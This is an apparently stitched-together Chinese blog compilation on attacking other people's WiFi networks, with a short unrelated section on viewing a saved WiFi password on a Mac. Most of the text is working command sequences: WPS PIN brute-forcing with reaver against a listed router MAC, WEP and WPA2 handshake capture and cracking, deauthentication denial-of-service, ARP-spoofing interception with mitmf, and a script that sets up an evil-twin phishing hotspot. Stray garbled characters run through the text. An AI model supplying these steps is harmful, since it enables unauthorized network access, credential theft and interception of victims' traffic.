本文目录一览:
过时的wifi破解工具
之前我们讲过了fluxion和aircrack破解wifi的方法
其实还有很多的wifi破解方式,不妨都试试。知晓每一个工具的优缺点,在合适的情境下去选择最适合的方法
不幸的是下面讲的这些破解方法基本已经成了古董了,只可远观而不可亵玩焉。
因为已经不怎么管用了...
如果想了解wifi历史的人可以继续接着看下去,其他的嘛就快点去看其他文章吧
弄这么多不能用的wifi有什么用呢?之后我们在知道钓鱼wifi的时候会用到,这里我们先讲一下
mdk3 wlan1 b -f FakeAPName.txt -c 2
只需要这么一句话
下面开始我的失败尝试了,愿意看的请留下听我讲述历史...
其实看看也好,可以避免你们继续这样失败的尝试,少浪费一些时间
现在路由器防pin真的是防的很好,我pin了至少30次,只pin出来过机房的很老的一台路由器,其他的总是被pin死,看来这11000次也并不想想象中那样脆弱。这是我做完这次实验的感受
reaver是通过路由器上一个叫做wps的功能来实现攻击的,WPS是许多路由器上都有的一个功能,可以为用户提供简单的配置过程,它与设备中硬编码保存的一个PIN码绑定在一起野凯腔。Reaver利用的就是PIN码的一个缺陷,最终的结果就是,只要有足够的时间,它就能破解WPA或WPA2的密码。
根据pin码破解的原理,可以看到只需要枚举11000种情况就会必然破解出pin码,从而通过pin得到wifi密码。 具体的为什么是11000种情况呢?
现在开始实现
1.将网卡调到监听模式
打开终端输入 airmon-ng start wlan0
2.扫描开启wps的路由器。
输入 wash -i wlan0mon
WPS Locked为No的就是开启wps服务的路由器,都可以尝试攻击
3.找到了开启WPS的wifi,接下来咱们就可以进行pin码爆破,下面主要说一下reaver的参数。
reaver 命令:
reaver -i mon0 -b mac -S -v
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例孙蠢子)
选择之前扫描出来的开启WPS的wifi,选择一个进行破解。
输入: reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4
在穷举的过程中,reaver会生成以路由mac地址为名的wpc文件,这个文件在kali系统中/etc/reaver/文件夹下。
一时半会pin不出来,过段时间pin的时候命令加参数 -s file.wpc,就会根据之前的进度继续pin。
最后pin完最后颂衫会显示WPS PIN(正确的pin码)和WPA PSK(wifi密码),同时如果WPS功能没关,pin码没修改,无论怎样修改密码,都可以通过pin码获取wifi密码: reaver -i wlan0mon -b mac -p pin 码,来再次得到密码
一般pin的过快,会把路由器pin死,所以 一般还会加上-d5 -t5参数 ,添加5秒延时,当然数值可以自己改。我添加了也照样被pin的死死的。不行了这个软件
很看好他,来试一下
1.打开终端输入wifite
2.我选择了all
3.结果一个也没整出来,他也是用的wps的来破解,现在用wps针对除了很老的路由器,其他的都不是很好办了
图形化界面,大家一看就会懂, 先选择网卡,扫描,破解
说一下主界面的右下角有一个 toolbox工具箱
试试
破解不好用,而且一打开他整个虚拟机都变得有些卡,破解的进度条根本不走
不推荐
我们来试一下他的这些附件
也都不管用,不知道是不是因为使用了https的缘故,反正他现在肯定是out了
参考的一些网站
七夜
freebuf
Mac连接wifi需要WPA2密码该怎么弄?
1、首先在mac电脑中,选中“本地项目”“密码”,可以看到正在连接的Wi-Fi帐号。
2、双击Wi-Fi帐号,在如图所示的“显示密码”前打勾。
3、这时碰纳悔候需要输入系统开机密码,如下图所示。
4、茄物然后wifi密码便显示出来了,查看成功,如下图所示就笑正完成了。
怎么攻击别人wifi?
1.保密性
我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI没有采取认证加密措施,任意用户均可链接WIFI,用户数据在BSS(基本服务集)中明文传输,恶意用户没有任何门槛就可连接,然后通过中间人攻击即可获取用户的数据(SSL、SSH等需要其他工具)。如下图所示:
WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码,然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包
aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下:
airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据,抓取handshake包
aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包,更快的获取handshake
aircrack-ng -w 你的字典文件备老盯 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码
密码破解成功后即可连接AP,通过中间人的方式获取用户仿和明文数据,或者直接用wireshark抓取加密包,然后通过airdecap-ng工具解密,然后用wireshark读取已经解密的数据包。
破解WPA、WPA2不一定成功,取决于你字典是否强大,此时我们可以想办法诱骗用户主动输入WIFI密码,比如我们创建一个和目标AP具有同样ESSID的软AP,用户可以连接上,单在浏览网页时会弹出一个虚假的认证页面,告诉用户必须输入WIFI的密码,用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。
wifiphisher将用户输入的密码当做WIFI的密码,但此密码并没有去验证,如果用户输入错误,也会提示出该密码。
而fluxion会将用户输入的密码与handshake校验,成功方认为获取到密码。
2.可用性
通过使目标用户无法使用WIFI来破坏无线系统的可用性,通常通过DOS攻击来实现,比如发送大量的deauth包来迫使用户station与AP解除认证、连接。
aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包,迫使目标station无法连接AP
mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接,从而耗尽AP的资源造成DOS攻击
3.真实性
(1)恶意用户进入无线系统后,可通过中间人攻击获取或修改用户数据。
ARP欺骗或DNS欺骗,ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通过driftnet工具抓取目标浏览网页含桐时的图片
driftnet -i wlan0
当然还可以利用中间人攻击做很多事情,比如获取cookie,嵌入js,结合beef进一步攻击等等。。。
(2)伪造AP进行钓鱼攻击
airbase -ng -e airmon wlan1mon #创建钓鱼热点
然后通过下面的脚本开启dhcp服务器(必须先安装isc-dhcp-server),开启路由,开启系统转发,开启防火墙nat等。
1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
此时用户可以不用密码即可连接airmon热点,并可以上网,但此时可以通过嗅探at0网卡获取用户数据。
4.完整性
篡改用户数据,在WIFI攻击这块貌似用处不大。
5.不可抵赖性